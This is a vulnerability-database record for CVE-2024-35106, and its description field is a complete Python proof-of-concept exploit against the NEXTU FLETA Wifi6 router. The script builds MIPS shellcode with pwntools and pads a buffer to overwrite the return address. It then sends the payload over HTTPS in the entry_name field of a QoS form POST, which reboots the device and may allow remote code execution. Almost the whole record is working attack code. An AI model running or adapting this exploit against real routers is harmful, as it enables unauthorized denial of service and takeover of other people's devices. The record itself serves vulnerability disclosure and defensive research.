{"uuid": "8b27e542-2740-435c-9317-55790ef4965b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "NEXTU FLETA Wifi6 Router DOS, Potential RCE POC", "description": "```python\nfrom pwn import *  \nfrom hackebds import *  \n  \n  \ndef shutdown_shell_code():  \n    context.update(arch='mips', os='linux', bits=32, endian='little')  \n  \n    cmd = \"/bin/sh\"  \n    args = [\"autoreboot\"]  \n  \n    asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit()  \n    shellcode = asm(asmcode)  \n    return shellcode  \n  \n  \npower_off_code = shutdown_shell_code()  \n  \ngap_code = (b'A') * 0x138\n\n# This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow.\n# For example I fixed address as 0x7f854710\nRET_address = (b'\\x10\\x47\\x85\\x7f')  \nstack_gap = (b'C') * 0x40  \n  \nprint(\"power_off_code_length\")  \nprint(len(power_off_code))  \n  \nfinal_code = power_off_code + gap_code + RET_address + stack_gap  \n  \nimport socket  \nimport ssl  \n  \n# Server Address and Port  \nHOST = '192.168.1.254'  \nPORT = 443  \n  \n# Create an SSL socket for HTTPS connection\ncontext = ssl.create_default_context()  \ncontext.set_ciphers('HIGH:!DH:!aNULL')  \ncontext.check_hostname = False  \ncontext.verify_mode = ssl.CERT_NONE  \n  \nwith socket.create_connection((HOST, PORT)) as sock:  \n    with context.wrap_socket(sock, server_hostname=HOST) as ssock:  \n            # Prepare the shellcode as bytes (e.g., b'\\x00\\x01\\x02'; replace with appropriate values for actual use)\n  \n        # parameter for evade verification  \n        send_byte = b\"enabled=ON&amp;automaticUplinkSpeed=ON&amp;automaticDownlinkSpeed=ON&amp;addressType=0&amp;ipversion=0&amp;protocol=0&amp;ipStart=192.168.1.5&amp;ipEnd=192.168.1.5&amp;localPortStart=1234&amp;localPortEnd=1234&amp;rmt_ipStart=&amp;rmt_ipEnd=&amp;rmt_portStart=&amp;rmt_portEnd=&amp;l7_protocol=Disable&amp;mode=1&amp;bandwidth=200&amp;bandwidth_downlink=200&amp;remark_dscp=&amp;save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&amp;addQosFlag=1&amp;lan_mask=255.255.255.0&amp;submit-url=%2Fip_qos.htm&amp;entry_name=\" + final_code  \n  \n        # POST request headers \n        headers = b\"POST /boafrm/formIpQoS HTTP/1.1\\r\\n\" \\  \n                  b\"Host: \" + HOST.encode('utf-8') + b\"\\r\\n\" \\  \n                                                     b\"Content-Type: application/octet-stream\\r\\n\" \\  \n                                                     b\"Content-Length: \" + str(len(send_byte)).encode(  \n            'utf-8') + b\"\\r\\nConnection: close\\r\\n\\r\\n\"  \n  \n        # Send request (combine headers and body)  \n        ssock.send(headers + send_byte)  \n  \n        # Receive response  \n        response = b\"\"  \n        while True:  \n            data = ssock.recv(1024)  \n            if not data:  \n                break  \n            response += data  \n  \n            #Print response  \n        print(response.decode('utf-8'))\n```", "description_format": "markdown", "vulnerability": "CVE-2024-35106", "creation_timestamp": "2025-02-07T03:41:54.937264+00:00", "timestamp": "2025-02-07T03:41:54.937264+00:00", "related_vulnerabilities": [], "meta": [{"ref": ["https://github.com/laskdjlaskdj12/CVE-2024-35106-POC"]}], "author": {"login": "sync_user", "name": "sync_user", "uuid": "4f29edb9-4c4b-44ca-b041-9b050656b6ae"}}